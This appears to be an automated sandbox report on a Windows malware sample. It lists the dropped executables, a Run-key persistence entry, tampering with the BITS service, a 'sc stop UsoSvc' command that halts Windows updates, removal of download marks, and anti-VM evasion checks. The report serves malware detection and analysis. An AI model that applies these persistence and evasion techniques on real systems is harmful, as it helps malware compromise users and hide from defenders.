                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_004B10B0
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B1CB1 push ecx; ret 0_2_004B1CC4

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files with a suspicious file extension
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile created: C:\Users\user\AppData\Local\Temp\33080.scrJump to dropped file
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrExecutable created and started: C:\Windows\sysppvrdnvs.exeJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_004B10B0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrFile created: C:\Windows\sysppvrdnvs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exeJump to dropped file
                              Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\818921588.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile created: C:\Users\user\AppData\Local\Temp\33080.scrJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrFile created: C:\Windows\sysppvrdnvs.exeJump to dropped file
                              Source: C:\Windows\sysppvrdnvs.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITSJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Hides that the sample has been downloaded from the Internet (zone.identifier)
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrFile opened: C:\Users\user\AppData\Local\Temp\33080.scr:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Windows\sysppvrdnvs.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\264162301.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\229472814.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\818921588.exe:Zone.Identifier read attributes | deleteJump to behavior
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Contains functionality to detect sleep reduction / modifications
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040D7701_2_0040D770
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040D7702_2_0040D770
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040D77017_2_0040D770
                              Found evasive API chain (may stop execution after checking mutex)
                              Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_17-4451
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4451
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-4451
                              Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_17-4451
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7787Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1787Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrEvaded block: after key decisiongraph_1-4467
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrEvaded block: after key decisiongraph_1-4453
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrEvaded block: after key decisiongraph_1-4535
                              Source: C:\Windows\sysppvrdnvs.exeEvaded block: after key decisiongraph_17-4451
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_1-5407
                              Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_2-5878
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-4474
                              Source: C:\Windows\sysppvrdnvs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-4498
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrAPI coverage: 3.7 %
                              Source: C:\Windows\sysppvrdnvs.exeAPI coverage: 0.9 %
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040D77017_2_0040D770
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040D7701_2_0040D770
                              Source: C:\Windows\sysppvrdnvs.exe TID: 340Thread sleep time: -40000s >= -30000sJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exe TID: 340Thread sleep count: 111 > 30Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exe TID: 4180Thread sleep time: -53205s >= -30000sJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exe TID: 6968Thread sleep time: -31490s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep count: 7787 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep count: 1787 > 30Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                              Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                              Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                              Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                              Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_004068E0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,17_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_004067A0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
                              Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 40000Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 53205Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeThread delayed: delay time: 31490Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmp, Bjl3geiFEK.exe, 00000000.00000002.1807520857.0000000001379000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903094197.000000000065F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1937078841.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903094197.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.000000000065F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.000000000069F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903094197.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWF2od
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrAPI call chain: ExitProcess graph end nodegraph_1-4452
